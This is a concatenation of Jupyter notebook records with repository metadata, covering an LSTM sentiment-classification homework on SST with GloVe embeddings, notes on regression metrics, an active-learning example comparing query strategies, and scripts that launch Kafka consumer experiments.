"tensor([0.0000, 0.6000, 0.0000, 1.4000, 0.0000])\n"
]
],
[
[
"> **Problem 4.1** *(3 points)* Implement and use LSTM (without using PyTorch's LSTM module) instead of vanilla RNN. Report the accuracy on the dev data.\n\n> **Problem 4.2** *(2 points)* Use Dropout on LSTM (either at input or output). Report the accuracy on the dev data.\n\n> **Problem 4.3 (bonus)** *(2 points)* Consider implementing bidirectional LSTM and two layers of LSTM. Concatenate the forward direction output at the final time step and the backward direction output at the first time step for the final classificaiton. Report your accuracy on dev data.",
"_____no_output_____"
],
[
"## (Answer)\n\n**Problem 4.1.**\n(See the code below.) Validation accuracy of LSTM after 10 epochs is 66.94%.\n\n**Problem 4.2.**\n(See the code below.) Validation accuracy of LSTM with Dropout after 10 epochs is 68.76%.\n\n**Problem 4.3.**\n(See the code below.) Validation accuracy of bi-directional stacked (2 layers) LSTM after 10 epochs is 64.03%.",
"_____no_output_____"
]
],
[
[
"### Problem 4.1 ###\n\nimport time\n\nclass LSTM(nn.Module):\n def __init__(self, seq_length, hidden_dim, embed_dim, dropout=False, pretrained=False):\n super(LSTM, self).__init__()\n self.seq_length = seq_length\n self.hidden_dim = hidden_dim\n self.embed_dim = embed_dim\n self.pretrained = pretrained\n\n if not self.pretrained:\n self.embedding = nn.Embedding(len(vocab), embed_dim)\n self.linear_input = nn.Linear(embed_dim + hidden_dim, hidden_dim)\n self.linear_forget = nn.Linear(embed_dim + hidden_dim, hidden_dim)\n self.linear_cell = nn.Linear(embed_dim + hidden_dim, hidden_dim)\n self.linear_output = nn.Linear(embed_dim + hidden_dim, hidden_dim)\n\n self.classifier = nn.Linear(hidden_dim, 2)\n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n if dropout:\n self.dropout = nn.Dropout(p=0.5)\n else:\n self.dropout = None\n\n def forward(self, input):\n assert self.seq_length == input.size(1) # batch_first\n if not self.pretrained:\n emb = self.embedding(input)\n else:\n emb = input\n h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n c_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n\n for seq in range(self.seq_length):\n i_t = self.sigmoid(self.linear_input(torch.cat([emb[:, seq, :], h_t], dim=-1)))\n f_t = self.sigmoid(self.linear_forget(torch.cat([emb[:, seq, :], h_t], dim=-1)))\n g_t = self.tanh(self.linear_cell(torch.cat([emb[:, seq, :], h_t], dim=-1)))\n o_t = self.sigmoid(self.linear_output(torch.cat([emb[:, seq, :], h_t], dim=-1)))\n\n c_t = f_t * c_t + i_t * g_t\n h_t = o_t * self.tanh(c_t)\n\n if self.dropout is not None:\n h_t = self.dropout(h_t)\n out = self.classifier(h_t)\n return out\n\nlstm = LSTM(seq_length=16, hidden_dim=64, embed_dim=64).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)\n\n\nfor epoch in range(10):\n start = time.time()\n lstm.train()\n avg_loss = 0\n for input, label in train_loader:\n logits = lstm(input.cuda())\n loss = cel(logits, label.cuda())\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n end = time.time() - start\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}, Time {end}s')\n\n lstm.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n logits = lstm(input.cuda())\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.700248077567597, Time 21.331552743911743s\nEpoch 1, Valid Acc 0.5522252497729337\nEpoch 2, Train Loss 0.6394619273670604, Time 21.157572746276855s\nEpoch 2, Valid Acc 0.6267029972752044\nEpoch 3, Train Loss 0.4642184291327937, Time 20.68288016319275s\nEpoch 3, Valid Acc 0.6603088101725704\nEpoch 4, Train Loss 0.32396950177876244, Time 20.515620708465576s\nEpoch 4, Valid Acc 0.667574931880109\nEpoch 5, Train Loss 0.25231142262736345, Time 20.70114278793335s\nEpoch 5, Valid Acc 0.6757493188010899\nEpoch 6, Train Loss 0.2162350971174988, Time 20.935175895690918s\nEpoch 6, Valid Acc 0.6548592188919165\nEpoch 7, Train Loss 0.16316376408049313, Time 21.018038034439087s\nEpoch 7, Valid Acc 0.6821071752951862\nEpoch 8, Train Loss 0.12651554092700323, Time 21.22074818611145s\nEpoch 8, Valid Acc 0.662125340599455\nEpoch 9, Train Loss 0.10965743735288741, Time 20.96744990348816s\nEpoch 9, Valid Acc 0.6693914623069936\nEpoch 10, Train Loss 0.11846032501298634, Time 21.01356315612793s\nEpoch 10, Valid Acc 0.6530426884650318\n==================================================\nLast Validation Accuracy: 0.6530426884650318\n"
],
[
"### Problem 4.2 ###\n\nlstm = LSTM(seq_length=16, hidden_dim=64, embed_dim=64, dropout=True).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)\n\nfor epoch in range(10):\n lstm.train()\n avg_loss = 0\n for input, label in train_loader:\n logits = lstm(input.cuda())\n loss = cel(logits, label.cuda())\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')\n\n lstm.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n logits = lstm(input.cuda())\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.7021140858028712\nEpoch 1, Valid Acc 0.5894641235240691\nEpoch 2, Train Loss 0.6200328616613753\nEpoch 2, Valid Acc 0.6485013623978202\nEpoch 3, Train Loss 0.4675403159767501\nEpoch 3, Valid Acc 0.6966394187102634\nEpoch 4, Train Loss 0.3609386019352893\nEpoch 4, Valid Acc 0.6920980926430518\nEpoch 5, Train Loss 0.28877523076835643\nEpoch 5, Valid Acc 0.6948228882833788\nEpoch 6, Train Loss 0.2440362356791503\nEpoch 6, Valid Acc 0.6939146230699365\nEpoch 7, Train Loss 0.20462624923315612\nEpoch 7, Valid Acc 0.6884650317892824\nEpoch 8, Train Loss 0.18639810670216042\nEpoch 8, Valid Acc 0.6811989100817438\nEpoch 9, Train Loss 0.1740493546571401\nEpoch 9, Valid Acc 0.695731153496821\nEpoch 10, Train Loss 0.15924992400948795\nEpoch 10, Valid Acc 0.6875567665758402\n==================================================\nLast Validation Accuracy: 0.6875567665758402\n"
],
[
"### Problem 4.3 ###\n\nclass BiStackedLSTM(nn.Module):\n def __init__(self, seq_length, hidden_dim, embed_dim, dropout=False):\n super(BiStackedLSTM, self).__init__()\n self.seq_length = seq_length\n self.hidden_dim = hidden_dim\n self.embed_dim = embed_dim\n\n self.embedding = nn.Embedding(len(vocab), embed_dim)\n self.layers = []\n assert embed_dim == hidden_dim # I used the same dimension for convenience\n for layer in range(2):\n layer_dict = {}\n layer_dict['input_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()\n layer_dict['forget_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()\n layer_dict['cell_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()\n layer_dict['output_gate'] = nn.Linear(embed_dim + hidden_dim, hidden_dim).cuda()\n self.layers.append(layer_dict)\n \n self.classifier = nn.Linear(hidden_dim*2, 2)\n self.sigmoid = nn.Sigmoid()\n self.tanh = nn.Tanh()\n\n if dropout:\n self.dropout = nn.Dropout(p=0.5)\n else:\n self.dropout = None\n\n def forward(self, input):\n assert self.seq_length == input.size(1) # batch_first\n emb = self.embedding(input)\n\n h_t_bi = []\n for direction in [range(self.seq_length), range(self.seq_length)[::-1]]:\n # 1st layer\n all_h_t = []\n h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n c_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n for seq in direction:\n i_t = self.sigmoid(self.layers[0]['input_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))\n f_t = self.sigmoid(self.layers[0]['forget_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))\n g_t = self.tanh(self.layers[0]['cell_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))\n o_t = self.sigmoid(self.layers[0]['output_gate'](torch.cat([emb[:, seq, :], h_t], dim=-1)))\n c_t = f_t * c_t + i_t * g_t\n h_t = o_t * self.tanh(c_t)\n if self.dropout is not None:\n h_t = self.dropout(h_t)\n all_h_t.append(h_t)\n # 2nd layer\n h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n c_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n for seq in direction:\n i_t = self.sigmoid(self.layers[1]['input_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))\n f_t = self.sigmoid(self.layers[1]['forget_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))\n g_t = self.tanh(self.layers[1]['cell_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))\n o_t = self.sigmoid(self.layers[1]['output_gate'](torch.cat([all_h_t[seq], h_t], dim=-1)))\n c_t = f_t * c_t + i_t * g_t\n h_t = o_t * self.tanh(c_t)\n if self.dropout is not None:\n h_t = self.dropout(h_t)\n h_t_bi.append(h_t) # last (or first) hidden state\n\n h_t_concat = torch.cat(h_t_bi, dim=-1) # [B, hidden_dim*2]\n out = self.classifier(h_t_concat)\n return out\n\n\nmodel = BiStackedLSTM(seq_length=16, hidden_dim=64, embed_dim=64, dropout=True).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01)\n\nfor epoch in range(10):\n model.train()\n avg_loss = 0\n for input, label in train_loader:\n logits = model(input.cuda())\n loss = cel(logits, label.cuda())\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')\n\n model.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n logits = model(input.cuda())\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.6937321649955006\nEpoch 1, Valid Acc 0.5785649409627611\nEpoch 2, Train Loss 0.6566966125246291\nEpoch 2, Valid Acc 0.6012715712988193\nEpoch 3, Train Loss 0.5758043701729078\nEpoch 3, Valid Acc 0.6021798365122616\nEpoch 4, Train Loss 0.5019804891129112\nEpoch 4, Valid Acc 0.6121707538601272\nEpoch 5, Train Loss 0.43898056347048686\nEpoch 5, Valid Acc 0.6158038147138964\nEpoch 6, Train Loss 0.399179231696361\nEpoch 6, Valid Acc 0.6521344232515894\nEpoch 7, Train Loss 0.34490792578860613\nEpoch 7, Valid Acc 0.6503178928247049\nEpoch 8, Train Loss 0.2993847786375646\nEpoch 8, Valid Acc 0.6512261580381471\nEpoch 9, Train Loss 0.2646490029872078\nEpoch 9, Valid Acc 0.6457765667574932\nEpoch 10, Train Loss 0.2349852400549342\nEpoch 10, Valid Acc 0.6403269754768393\n==================================================\nLast Validation Accuracy: 0.6403269754768393\n"
]
],
[
[
"## 5. Pretrained Word Vectors\nThe last step is to use pretrained vocabulary and word vectors. The prebuilt vocabulary will replace the vocabulary you built with SST training data, and the word vectors will replace the embedding vectors. You will observe the power of leveraging self-supservised pretrained models.\n\n> **Problem 5.1 (bonus)** *(2 points)* Go to https://nlp.stanford.edu/projects/glove/ and download `glove.6B.zip`. Use these pretrained word vectors to replace word embeddings in your model from 4.2. Report the model's accuracy on the dev data.",
"_____no_output_____"
],
[
"## (Answer)\n\n**Problem 5.1.**\n(See the code below.) Validation accuracy of LSTM using the pretrained embeddings after 10 epochs training is 70.75%. Leveraging the self-supervised pretrained information helps the downstream classification task.",
"_____no_output_____"
]
],
[
[
"!wget https://nlp.stanford.edu/data/glove.6B.zip\n!unzip glove.6B.zip",
"--2021-09-26 13:59:12-- https://nlp.stanford.edu/data/glove.6B.zip\nResolving nlp.stanford.edu (nlp.stanford.edu)... 171.64.67.140\nConnecting to nlp.stanford.edu (nlp.stanford.edu)|171.64.67.140|:443... connected.\nHTTP request sent, awaiting response... 301 Moved Permanently\nLocation: http://downloads.cs.stanford.edu/nlp/data/glove.6B.zip [following]\n--2021-09-26 13:59:13-- http://downloads.cs.stanford.edu/nlp/data/glove.6B.zip\nResolving downloads.cs.stanford.edu (downloads.cs.stanford.edu)... 171.64.64.22\nConnecting to downloads.cs.stanford.edu (downloads.cs.stanford.edu)|171.64.64.22|:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 862182613 (822M) [application/zip]\nSaving to: ‘glove.6B.zip’\n\nglove.6B.zip 100%[===================>] 822.24M 5.06MB/s in 2m 42s \n\n2021-09-26 14:01:55 (5.08 MB/s) - ‘glove.6B.zip’ saved [862182613/862182613]\n\nArchive: glove.6B.zip\n inflating: glove.6B.50d.txt \n inflating: glove.6B.100d.txt \n inflating: glove.6B.200d.txt \n inflating: glove.6B.300d.txt \n"
],
[
"### Problem 5.1 - (1) ###\nimport numpy as np\n\nvocab = ['PAD', 'UNK']\nembedding = np.zeros((400002, 300), dtype=np.float32)\nembedding[1,:] = np.random.randn(300) # random number for UNK\nwith open('./glove.6B.300d.txt') as f:\n for i, line in enumerate(f.readlines()):\n vocab.append(line.split(' ')[0])\n embedding[i+2] = np.array(line.split(' ')[1:], dtype=np.float32)\nword2id = {word: id_ for id_, word in enumerate(vocab)}\nprint('Vocabulary size: {}'.format(len(vocab)))",
"Vocabulary size: 400002\n"
],
[
"### Problem 5.1 - (2) ###\n\nclass SSTDataset(torch.utils.data.Dataset):\n def __init__(self, split, length=16):\n assert split in ['train', 'validation', 'test']\n self._data = sst_dataset[split]\n self.input_lst, self.label_lst = [], []\n for data in self._data:\n sentence = data['sentence'] \n tokens = sentence.split(' ')\n input_ids = [word2id[word] if word in word2id else 1 for word in tokens] # UNK if word not found\n if len(input_ids) < length:\n input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end\n else:\n input_ids = input_ids[:length]\n self.input_lst.append(torch.tensor(embedding[input_ids])) # use the pretrained embedding\n\n label = round(data['label'])\n self.label_lst.append(label)\n\n def __getitem__(self, idx):\n return self.input_lst[idx], self.label_lst[idx]\n\n def __len__(self):\n return len(self._data)\n\ntrainset = SSTDataset('train')\nvalidset = SSTDataset('validation')\ntrain_loader = torch.utils.data.DataLoader(trainset, batch_size=16, shuffle=True)\nvalid_loader = torch.utils.data.DataLoader(validset, batch_size=16, shuffle=False)",
"_____no_output_____"
],
[
"### Problem 5.1 - (3) ###\n\nlstm = LSTM(seq_length=16, hidden_dim=128, embed_dim=300, dropout=True, pretrained=True).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(lstm.parameters(), lr=0.01)\n\nfor epoch in range(10):\n lstm.train()\n avg_loss = 0\n for input, label in train_loader:\n logits = lstm(input.cuda())\n loss = cel(logits, label.cuda())\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')\n\n lstm.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n logits = lstm(input.cuda())\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.6598808100161034\nEpoch 1, Valid Acc 0.7129881925522252\nEpoch 2, Train Loss 0.5778945932506622\nEpoch 2, Valid Acc 0.706630336058129\nEpoch 3, Train Loss 0.5275646816757734\nEpoch 3, Valid Acc 0.7211625794732062\nEpoch 4, Train Loss 0.489664972470271\nEpoch 4, Valid Acc 0.7184377838328792\nEpoch 5, Train Loss 0.46001328106564976\nEpoch 5, Valid Acc 0.7157129881925522\nEpoch 6, Train Loss 0.4412068678728873\nEpoch 6, Valid Acc 0.7247956403269755\nEpoch 7, Train Loss 0.4032142126744383\nEpoch 7, Valid Acc 0.7293369663941871\nEpoch 8, Train Loss 0.39443781687302537\nEpoch 8, Valid Acc 0.7229791099000908\nEpoch 9, Train Loss 0.3683058825994699\nEpoch 9, Valid Acc 0.7120799273387829\nEpoch 10, Train Loss 0.3465916405288914\nEpoch 10, Valid Acc 0.7075386012715713\n==================================================\nLast Validation Accuracy: 0.7075386012715713\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb2a8661d3feaf773956f663afa3712ce9bd8844 | 5,095 | ipynb | Jupyter Notebook | metrics_optimization/regression_metrics.ipynb | alikhanlab/data_science_project_approach | 8b505bce2802003a4e949842b8ddcd2a544a2c92 | [
"MIT"
] | null | null | null | metrics_optimization/regression_metrics.ipynb | alikhanlab/data_science_project_approach | 8b505bce2802003a4e949842b8ddcd2a544a2c92 | [
"MIT"
] | null | null | null | metrics_optimization/regression_metrics.ipynb | alikhanlab/data_science_project_approach | 8b505bce2802003a4e949842b8ddcd2a544a2c92 | [
"MIT"
] | null | null | null | 24.37799 | 144 | 0.535034 | [
[
[
"# Regression Metrics\n\nMetrics covered: \n\n#### 1) MSE, RMSE, R-squared\n\n#### 2) MAE\n\n#### 3) (R)MSPE, MAPE\n\n#### 4) (R)MSLE\n",
"_____no_output_____"
],
[
"#### Notation\n\n",
"_____no_output_____"
],
[
"# MSE: Mean Squared Error\n\n\n\n\n### How to evaluate MSE ?\n\nFirst, you make baseline and check if your model beats this baseline.\n\n`Baseline` - best constant model, it's different for different metrics.\n\nFor `MSE` best constant: `target mean`.\n\nSo just compute MSE baseline, and see if your model beats it.\n\n\n\n",
"_____no_output_____"
],
[
"## RMSE (Root Mean Squared Error)\n\n\n\n\nSo why we need RMSE?\n\n- To make scale of errors like target scale.\n\n\n`Similarity`: MSE and RMSE are the same minimization. It means if we minize MSE, then we automatically minimize RMSE. \n\n`Difference`: not the same for gradient based models, because of different learning rates. (because 1/(2*sqrt(mse) of second derivative)\n",
"_____no_output_____"
],
[
"# R-squared\n\n\n\n\nR^2 = 0 (not better than baseline)\n\nR^2 = 1 (model explains 100% variability in data, not always means good model)\n\nWe can optimize R-squared by optimizing MSE, RMSE",
"_____no_output_____"
],
[
"# MAE: Mean Abosulte Error\n\n\n\n- Not sensative to outliers, more robust than MSE, not influenced by outliers\n- Mostly used in finance\n\n\nHow to evaluate MAE ?\n\nCompute baseline MAE and compare it with your model, if your model beats baseline.\n\n\n",
"_____no_output_____"
],
[
"# General guide of regression metrics\n\n- If `unusual objects are normal`, not ignore them and use MSE.\n\n- Otherwise, if unusual objects are mistakes (entry mistakes, ETL mistakes, typos) use MAE",
"_____no_output_____"
],
[
"# Regression Metrics for Relative Error\n\nShop 1: predicted 9, sold 10, MSE = 1\n\nShop 2: predicted 999, sold 1000, MSE = 1\n\nIt's clear that Shop 2 did better, even MSE is the same. So we need metric to calculate relative error.\n\nSo if we adjust error to relative error.\n\nShop 1: predicted 9, sold 10, MSE = 1\n\nShop 2: predicted 900, sold 1000, MSE = 10'000\n\nShop 1: predicted 9, sold 10, relative_metric = 1\n\nShop 2: predicted 900, sold 1000, relative_metric = 1\n",
"_____no_output_____"
],
[
"# MSPE: Mean Squared Percentage Error (measures relative error)\n\n\n\n\nTo evaluate MSPE, check if your model beats baseline.\n\n",
"_____no_output_____"
],
[
"# MAPE: Mean Absolute Percentage Error (measures relative error)\n\n\n\nTo evaluate MAPE, check if your model beats baseline. \n\n",
"_____no_output_____"
],
[
"# RMSLE: Root Mean Square Logaritmic Error (measures relative error)\n\n\n\n\nTo evalute, compare with baseline. Best constant - `exp(y_target_mean)` instead of y_hat",
"_____no_output_____"
]
]
] | [
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb2a86d0df583f9c12175c2c0b5278f4e5e473d1 | 70,521 | ipynb | Jupyter Notebook | example.ipynb | theodore-ando/active-learning | c0be13cf93ee172ebb7eee2a87c390d209b12bd8 | [
"Apache-2.0"
] | 5 | 2018-08-30T18:55:00.000Z | 2019-04-11T02:20:06.000Z | example.ipynb | theodore-ando/active-learning | c0be13cf93ee172ebb7eee2a87c390d209b12bd8 | [
"Apache-2.0"
] | 1 | 2018-10-05T22:17:14.000Z | 2018-10-05T22:17:14.000Z | example.ipynb | theodore-ando/active-learning | c0be13cf93ee172ebb7eee2a87c390d209b12bd8 | [
"Apache-2.0"
] | 2 | 2018-09-19T20:45:40.000Z | 2022-03-31T06:57:30.000Z | 208.642012 | 24,656 | 0.921683 | [
[
[
"# Example of simple use of active learning API\nCompare 3 query strategies: random sampling, uncertainty sampling, and active search.\nObserve how we trade off between finding targets and accuracy.",
"_____no_output_____"
],
[
"# Imports",
"_____no_output_____"
]
],
[
[
"import warnings\nwarnings.filterwarnings(action='ignore', category=RuntimeWarning)\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\n\nfrom sklearn.base import clone\nfrom sklearn.datasets import make_moons\nfrom sklearn.svm import SVC\n\nimport active_learning\nfrom active_learning.utils import *\nfrom active_learning.query_strats import random_sampling, uncertainty_sampling, active_search\n\n%matplotlib inline",
"_____no_output_____"
],
[
"np.random.seed(0)",
"_____no_output_____"
]
],
[
[
"# Load toy data",
"_____no_output_____"
],
[
"Have a little binary classification task that is not linearly separable.",
"_____no_output_____"
]
],
[
[
"X, y = make_moons(noise=0.1, n_samples=200)",
"_____no_output_____"
],
[
"plt.scatter(X[y==0,0], X[y==0,1])\nplt.scatter(X[y==1,0], X[y==1,1])",
"_____no_output_____"
]
],
[
[
"# Training Models",
"_____no_output_____"
]
],
[
[
"# Our basic classifier will be a SVM with rbf kernel\nbase_clf = SVC(probability=True)\n\n# size of the initial labeled set\ninit_L_size = 5\n\n# Make 30 queries\nn_queries = 30\n\n# set random state for consistency in training data\nrandom_state = 123",
"_____no_output_____"
]
],
[
[
"### Random Sampling",
"_____no_output_____"
]
],
[
[
"random_experiment_data = perform_experiment(\n X, y, \n base_estimator=clone(base_clf), \n query_strat=random_sampling,\n n_queries=n_queries,\n init_L_size=init_L_size,\n random_state=random_state\n)",
"100%|██████████| 30/30 [00:00<00:00, 650.20it/s]\n"
]
],
[
[
"### Uncertainty Sampling",
"_____no_output_____"
]
],
[
[
"uncertainty_experiment_data = perform_experiment(\n X, y,\n base_estimator=clone(base_clf),\n query_strat=uncertainty_sampling,\n n_queries=n_queries,\n init_L_size=init_L_size,\n random_state=random_state\n)",
"100%|██████████| 30/30 [00:00<00:00, 506.46it/s]\n"
]
],
[
[
"### Active Search",
"_____no_output_____"
]
],
[
[
"as_experiment_data = perform_experiment(\n X, y,\n base_estimator=clone(base_clf),\n query_strat=active_search,\n n_queries=n_queries,\n init_L_size=init_L_size,\n random_state=random_state\n)",
"100%|██████████| 30/30 [00:10<00:00, 3.00it/s]\n"
]
],
[
[
"# Compare",
"_____no_output_____"
]
],
[
[
"xx = np.arange(n_queries)\n\nplt.plot(xx, random_experiment_data[\"accuracy\"], label=\"Random\")\nplt.plot(xx, uncertainty_experiment_data[\"accuracy\"], label=\"Uncertainty\")\nplt.plot(xx, as_experiment_data[\"accuracy\"], label=\"AS\")\n\nplt.title(\"Accuracy on Test Set vs Num Queries\")\nplt.ylabel(\"accuracy\")\nplt.xlabel(\"# queries\")\nplt.legend()",
"_____no_output_____"
],
[
"plt.plot(xx, random_experiment_data[\"history\"], label=\"Random\")\nplt.plot(xx, uncertainty_experiment_data[\"history\"], label=\"Uncertainty\")\nplt.plot(xx, as_experiment_data[\"history\"], label=\"AS\")\n\nplt.title(\"Number of targets found\")\nplt.ylabel(\"# of targets\")\nplt.xlabel(\"# queries\")\nplt.legend()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2a99c49f4cefb3df2ef6ed082cef95d2f53c3c | 4,412 | ipynb | Jupyter Notebook | src/hostedkafka/Start_Experiments.ipynb | MariamBARRY/streaming-online-learning | b26a4e1c9e901eb9d45d7651ad7718a190c916ee | [
"Apache-2.0"
] | 1 | 2021-04-26T21:37:45.000Z | 2021-04-26T21:37:45.000Z | src/hostedkafka/Start_Experiments.ipynb | MariamBARRY/streaming-online-learning | b26a4e1c9e901eb9d45d7651ad7718a190c916ee | [
"Apache-2.0"
] | 3 | 2021-04-01T16:27:47.000Z | 2021-04-05T15:44:23.000Z | src/hostedkafka/Start_Experiments.ipynb | MariamBARRY/streaming-online-learning | b26a4e1c9e901eb9d45d7651ad7718a190c916ee | [
"Apache-2.0"
] | 2 | 2021-03-09T16:50:15.000Z | 2021-04-01T12:31:36.000Z | 27.067485 | 81 | 0.373527 | [
[
[
"# Start experiments",
"_____no_output_____"
]
],
[
[
"from time import sleep\nfrom domino import Domino\ndomino = Domino(\"katie_shakman/river-ml\")",
"_____no_output_____"
],
[
"# Arguments: \n# num_partitions_per_job, \n# list_of_partitions, \n# request_topic, \n# inference_topic, \n# bootstrap_servers # temporarily removed argument\n# model_name # ex: HoeffdingTreeClassifier30 # temporarily removed argument",
"_____no_output_____"
]
],
[
[
"#### One Job, Eight Partitions",
"_____no_output_____"
]
],
[
[
"domino.runs_start([\"kafka_consumer_v2.py\", # Fill in with script name \n \"8\", \n \"[0,1,2,3,4,5,6,7]\", \n \"T8\", \n \"I16\", \n \"group_5\"\n ], \n title=\"Using 8 Partitions Per Job\")",
"_____no_output_____"
]
],
[
[
"#### Two Jobs, Four Partitions Per Job",
"_____no_output_____"
]
],
[
[
"domino.runs_start([\"kafka_consumer_v2.py\", # Fill in with script name \n \"4\", \n \"[0,1,2,3]\", \n \"T8\", \n \"I17\", \n \"group_2\"\n ], \n title=\"Using 4 Partitions Per Job\")\ndomino.runs_start([\"kafka_consumer_v2.py\", \n \"4\", \n \"[4,5,6,7]\", \n \"T8\", \n \"I17\", \n \"group_2\"\n ], \n title=\"Using 4 Partitions Per Job\")",
"_____no_output_____"
]
],
[
[
"#### Four Jobs, Two Partitions Per Job",
"_____no_output_____"
]
],
[
[
"domino.runs_start([\"kafka_consumer_v2.py\", # Fill in with script name \n \"2\", \n \"[0,1]\", \n \"T8\", \n \"I18\", \n \"group_3\"\n ], \n title=\"Using 2 Partitions Per Job\")\n\ndomino.runs_start([\"kafka_consumer_v2.py\", \n \"2\", \n \"[2,3]\", \n \"T8\", \n \"I18\", \n \"group_3\"\n ], \n title=\"Using 2 Partitions Per Job\")\n\ndomino.runs_start([\"kafka_consumer_v2.py\", \n \"2\", \n \"[4,5]\", \n \"T8\", \n \"I18\", \n \"group_3\"\n ], \n title=\"Using 2 Partitions Per Job\")\n\ndomino.runs_start([\"kafka_consumer_v2.py\", \n \"2\", \n \"[6,7]\", \n \"T8\", \n \"I18\", \n \"group_3\"\n ], \n title=\"Using 2 Partitions Per Job\")",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2aa016de3a1bceb5ff4e73cb5d4445473c96eb | 102,899 | ipynb | Jupyter Notebook | Gagan_Singh_DS11_Sprint_Challenge_7.ipynb | gagansingh23/DS-Unit-2-Applied-Modeling | 883b6cd290c679e33318c1781130291f90776c12 | [
"MIT"
] | null | null | null | Gagan_Singh_DS11_Sprint_Challenge_7.ipynb | gagansingh23/DS-Unit-2-Applied-Modeling | 883b6cd290c679e33318c1781130291f90776c12 | [
"MIT"
] | null | null | null | Gagan_Singh_DS11_Sprint_Challenge_7.ipynb | gagansingh23/DS-Unit-2-Applied-Modeling | 883b6cd290c679e33318c1781130291f90776c12 | [
"MIT"
] | null | null | null | 129.92298 | 46,492 | 0.840105 | [
[
[
